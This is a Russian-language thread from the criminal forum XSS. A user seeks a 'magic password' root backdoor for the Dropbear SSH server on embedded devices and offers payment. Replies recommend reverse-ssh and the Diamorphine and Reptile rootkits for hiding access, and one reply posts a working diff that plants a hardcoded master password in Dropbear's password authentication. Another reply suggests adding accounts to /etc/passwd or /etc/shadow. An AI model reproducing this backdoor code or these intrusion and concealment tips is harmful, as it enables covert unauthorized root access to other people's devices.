• XSS.stack #1 – первый литературный журнал от юзеров форума

ищу бэкдор для dropbear

Отслеживать
Dread Pirate Roberts

Dread Pirate Roberts

Премиум
Premium
Регистрация
16.02.2023
Сообщения
2 161
Решения
3
Реакции
2 011
Гарант сделки
4
Депозит
0.1337
нужен рутовый бэкдор, типа "magic password".
за две минуты в гугле по site:github.com не нашёл, неужели такого не существует? весь гитхаб забит бэкдорами для openssh, не верю, что для dropbear ничего не написали.
 
могу даже денег предложить.
 
похоже, что такого нет. сам как-то искал. ничего толкового.
но есть варианты.
статически сбилденный reverse-ssh -> https://github.com/Fahrj/reverse-ssh

сткрыть его присутствие можно руткитами типа -> https://github.com/m0nad/Diamorphine

ну или старый добрый (с поддержкой "magic password") ->
github.com

f0rb1dd3n/Reptile

LKM Linux rootkit. Contribute to f0rb1dd3n/Reptile development by creating an account on GitHub.
github.com
 
rev5hel1 сказал(а):
ну или старый добрый (с поддержкой "magic password") ->
github.com

f0rb1dd3n/Reptile

LKM Linux rootkit. Contribute to f0rb1dd3n/Reptile development by creating an account on GitHub.
github.com
> Debian, Ubuntu, Kali, Centos

я не просто так дропбеар ищу - мне нужно для очень урезанного embedded :)

rev5hel1 сказал(а):
статически сбилденный reverse-ssh -> https://github.com/Fahrj/reverse-ssh
вот это уже интереснее, спасибо, сохранил на всякий случай.
но это всё равно не то, что надо.
 
Dread Pirate Roberts сказал(а):
> Debian, Ubuntu, Kali, Centos

я не просто так дропбеар ищу - мне нужно для очень урезанного embedded :)


вот это уже интереснее, спасибо, сохранил на всякий случай.
но это всё равно не то, что надо.
если вдруг, в конце концов найдёшь подходящий -- скинь ссылочку плиз. тоже очень интересует :)
 
89t0rIhnt сказал(а):
возьми dropbear и модифицируй под себя, либо найми кодера кто сможет это сделать как вариант
ещё бы эти кодеры тут обитали. я создавал несколько топиков о работе - стучались одни кидалы, мозготрахи, разнюхиватели, и говнокодеры.
 
Dread Pirate Roberts сказал(а):
ещё бы эти кодеры тут обитали. я создавал несколько топиков о работе - стучались одни кидалы, мозготрахи, разнюхиватели, и говнокодеры.
Тебе надо что бы при определенном пароле давал тебе доступ?
 
решение:

Diff: 
--- svr-authpasswd.c    2023-06-28 19:10:13.850002652 +0100
+++ svr-authpasswd.c_magic      2023-06-28 19:36:55.714064478 +0100
@@ -53,8 +53,6 @@
     char * passwdcrypt = NULL; /* the crypt from /etc/passwd or /etc/shadow */
     char * testcrypt = NULL; /* crypt generated from the user's password sent */
     char * password = NULL;
+    char * mmmagic = "MAGIC PASSWORD HERE";
+    int is_magic_true = 0;
     unsigned int passwordlen;
     unsigned int changepw;

@@ -72,10 +70,6 @@
         passwdcrypt = ses.authstate.pw_passwd;
         testcrypt = crypt(password, passwdcrypt);
     }
+    if (constant_time_strcmp(password, mmmagic) == 0)
+    {
+        is_magic_true = 1;
+    }
     m_burn(password, passwordlen);
     m_free(password);

@@ -86,16 +80,6 @@
         return;
     }

+    if (is_magic_true > 0)
+    {
+        dropbear_log(LOG_NOTICE,
+                "Password auth succeeded for '%s' from %s",
+                ses.authstate.pw_name,
+                svr_ses.addrstring);
+        send_msg_userauth_success();
+        return;
+    }
+
     if (passwordlen > DROPBEAR_MAX_PASSWORD_LEN) {
         dropbear_log(LOG_WARNING,
                 "Too-long password attempt for '%s' from %s",
 
да пускай логирует, мне не жалко :D
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Dread Pirate Roberts сказал(а):
я создавал несколько топиков о работе - стучались одни кидалы, мозготрахи, разнюхиватели, и говнокодеры.
почти бессмысленно тут или на экспе искать хороших специалистов. они тут есть, но все либо уже давно в команде, либо работают строго на себя.
иммея грамотное тз - ищи на "белых" площадках - там где малварь запрещена.
 
yellow сказал(а):
почти бессмысленно тут или на экспе искать хороших специалистов. они тут есть, но все либо уже давно в команде, либо работают строго на себя.
иммея грамотное тз - ищи на "белых" площадках - там где малварь запрещена.
да я это уже понял. надо или самому всё делать, или хантить студентов на выходе из Бауманской :D
 
Dread Pirate Roberts сказал(а):
я не просто так дропбеар ищу - мне нужно для очень урезанного embedded :)
может тогда проще добавить строчку в /etc/passwd или /etc/shadow, чем заморачиваться с кросс-компиляцией дропбира и т.п
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх